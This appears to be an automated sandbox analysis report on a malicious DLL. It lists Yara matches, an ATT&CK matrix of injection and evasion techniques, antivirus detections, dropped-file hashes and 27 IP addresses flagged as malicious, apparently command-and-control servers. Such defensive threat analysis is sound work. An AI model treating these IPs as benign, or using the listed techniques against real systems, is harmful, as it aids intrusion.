Source: Yara match	File source: 5.2.rundll32.exe.5600000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.33b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5670000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.54c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3080000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3660000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.33d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.54f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.4a10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5900000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5a60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.33b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5a60000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4050000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.388319825.0000000005640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388061342.00000000053B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388938400.0000000005A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425302680.00000000054F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388421865.00000000056A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.421593787.0000000004051000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388494502.00000000056D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388374896.0000000005671000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.424744123.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.390300102.0000000004A11000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388137915.0000000005460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425412117.0000000005600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388743358.0000000005900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425380885.00000000055D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.421559907.0000000004020000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.378920575.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.387667842.0000000004E61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.380234706.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.389941280.0000000003080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.377076576.00000000046D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.380280063.0000000000D31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425231298.00000000053C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.403315549.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.387995858.0000000005380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.379032722.0000000000D31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.389038479.0000000005A91000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425055302.0000000005200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.376980438.00000000046A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425273355.00000000054C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425444879.0000000005631000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388835673.0000000005931000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.387132452.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388209292.0000000005491000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425344500.00000000055A0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		3_2_10001160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		4_2_10001160

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API2	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	Input Capture1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection112	Obfuscated Files or Information2	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	DLL Side-Loading1	Security Account Manager	System Information Discovery35	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	File Deletion1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading2	LSA Secrets	Security Software Discovery51	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion3	Cached Domain Credentials	Virtualization/Sandbox Evasion3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Regsvr321	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ALNgwfVtrB.dll	15%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.rundll32.exe.5640000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
0.0.loaddll32.exe.b50000.3.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
0.0.loaddll32.exe.d30000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.53c0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.56d0000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.5490000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.5460000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
0.0.loaddll32.exe.b50000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.53b0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.5200000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.5a90000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.46a0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.54c0000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.55d0000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.46d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.5930000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.5630000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.55a0000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.56a0000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
0.0.loaddll32.exe.d30000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.5380000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.5600000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.4e60000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.33b0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.5670000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.regsvr32.exe.4020000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.3080000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.33d0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.54f0000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.3660000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.4a10000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.5900000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.5a60000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
3.2.regsvr32.exe.4050000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.b50000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
0.2.loaddll32.exe.d30000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.9.dr	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000015.00000003.504317499.000001E0BD583000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504779704.000001E0BDA19000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504403415.000001E0BD594000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504445076.000001E0BD5A5000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
104.131.62.48	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
185.148.168.15	unknown	Germany	44780	EVERSCALE-ASDE	true
51.210.242.234	unknown	France	16276	OVHFR	true
217.182.143.207	unknown	France	16276	OVHFR	true
69.16.218.101	unknown	United States	32244	LIQUIDWEBUS	true
159.69.237.188	unknown	Germany	24940	HETZNER-ASDE	true
45.138.98.34	unknown	Germany	9009	M247GB	true
116.124.128.206	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
185.148.168.220	unknown	Germany	44780	EVERSCALE-ASDE	true
54.37.228.122	unknown	France	16276	OVHFR	true
190.90.233.66	unknown	Colombia	18678	INTERNEXASAESPCO	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
128.199.192.135	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553377
Start date:	14.01.2022
Start time:	19:31:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ALNgwfVtrB (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winDLL@28/15@0/28
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 45.1% (good quality ratio 41.9%) Quality average: 73.2% Quality standard deviation: 28%
HCA Information:	Successful, ratio: 65% Number of executed functions: 39 Number of non-executed functions: 187
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210, 20.54.110.249, 40.91.112.76, 23.213.168.66 Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:33:51	API Interceptor	10x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Reputation:	unknown
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.2494552734353501
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU45:BJiRdwfu2SRU45
MD5:	ACEC30FA0B2887F7209FFA7C485EF3E6
SHA1:	729B9EBF8483F0E62F50146AB125A7E594EE5397
SHA-256:	012529C218728BF9B3632898D3B6DAD496391C68D17E00E5B3B7D519D3B63238
SHA-512:	CB8A710D87BE4A10A5690DFE99CD1F3ED52E252068BECDFCA3CB72F8B717680FCBA77B4DD4C7346911D8961B9CBB9FB629117C66E30132E6B5FAC13A7F1D08FC
Malicious:	false
Reputation:	unknown
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x1ff79e9b, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.25063246514845516
Encrypted:	false
SSDEEP:	384:+zH+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:+zsSB2nSB2RSjlK/+mLesOj1J2
MD5:	6A5F82169C1E928B7B2813D982DF0CC4
SHA1:	5E00E7DC875F2290DEB199B7CDFD88EB7F00FA2B
SHA-256:	9499ABBD834BC69C141A5659C76E2C1A226C0579893B10375BB19AA659A9BCD5
SHA-512:	E2B1AD0F38F387DA0207B6BBCBD8927AF5178C84C2EB291623E40AE892D58551DE356EB2BEAE42155B8267455B411B512942545112C0578B08DB11EDE4DC831D
Malicious:	false
Reputation:	unknown
Preview:	....... ................e.f.3...w........................)......%...z..:!...zS.h.(......%...z....)..............3...w...........................................................................................................B...........@...................................................................................................... .......................................................................................................................................................................................................................................................%...z.....................%...z..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07692722651967188
Encrypted:	false
SSDEEP:	3:wW9mllr7vfPUWff8+E2kfoulXDAopll3Vkttlmlnl:wWElZrEWUfoRa3
MD5:	72D779F2D6EEF5FD6670D0AA17207A6A
SHA1:	C9D5EC2D9E22E21027BE655F633AE052EA6991ED
SHA-256:	1FB083D386ED7399D0F5BF9006A1A2283F66D8DCD0CC6106B14D3E439F0CD0EA
SHA-512:	5DA3FB2B95F46E3D950A27070C25D6A2CD06F6FA79E0038F7AA5B60F071729343718C7FB41C154B1EC3B8A7C632431136C2EB13B947D0E5A875F1EFFF1721506
Malicious:	false
Reputation:	unknown
Preview:	..s......................................3...w..:!...z...%...z...........%...z...%...z.......%...z.....................%...z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_669a8c10d0efd6a57917dbe0788b74fa72a925de_7cac0383_1987fea0\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7987378948423511
Encrypted:	false
SSDEEP:	96:K6qnYy4y9haol7JfHpXIQcQSc6mcEUcw3/s+a+z+HbHgNVG4rmMoVazWbSmEBFdo:gnhHsieryj9q/u7sgS274ItW
MD5:	A403F656EF604A2E49F9E4ACC2129A24
SHA1:	AF381E16D8639F6C2A553E58499FC088D151624C
SHA-256:	198C574233F816519CA62027DD72FF837F64C00F391442DB3BE612A4F6C9BCD7
SHA-512:	717CAC97CE4145DD90A3B600D32BFF8B749DD64CA7B38E9AD853FEA5D72697EE8BF2DF181AC9350F93AF342880FD1A7A554820551FC0E62C20D07941945FFBBB
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.9.1.1.7.7.9.5.2.6.3.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.3.f.9.0.f.b.-.a.4.6.6.-.4.5.c.a.-.b.c.8.c.-.3.7.e.1.f.d.c.9.c.e.c.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.a.0.5.5.1.8.-.f.2.c.9.-.4.6.e.e.-.a.e.b.1.-.8.c.a.a.4.a.2.a.0.5.8.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.6.c.-.0.0.0.1.-.0.0.1.7.-.b.e.b.8.-.a.9.8.f.c.0.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER178B.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	51940
Entropy (8bit):	3.0778019180962497
Encrypted:	false
SSDEEP:	768:g+HIinEqdSlI0Lme/AFvprFwgzyLFOUP2IcOenKI:g+HIiTj0Lme/AFdFWL6IcxnKI
MD5:	F15E9557C7C73AC82EE1B580B68A2CED
SHA1:	3BE551D3FA3D2713F9A1E990F026642749A95291
SHA-256:	0884B007D12886A2952F62389F88D2AE4DB62DBB9932C30C436D19C3E17E5255
SHA-512:	82CB9E72779B86BBA19253D767B7C2269A5385546846EAAF39274F5868FA00BF23220DF70282CB0203AF2B440C9532C5933BC716517F4DBD3DE0643B02365628
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER20B4.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.695073459938915
Encrypted:	false
SSDEEP:	96:9GiZYWqRgM+egtYk6YoiWApH+YEZJXtFiPFPDxwUCoBaqS9SMUM8wIDA3:9jZDqRC760AalaqS9SMfuDA3
MD5:	D49BF9037244600A0CD2D79B93509810
SHA1:	2833D9A483D595D915E9DEB58BC9926FED4F759E
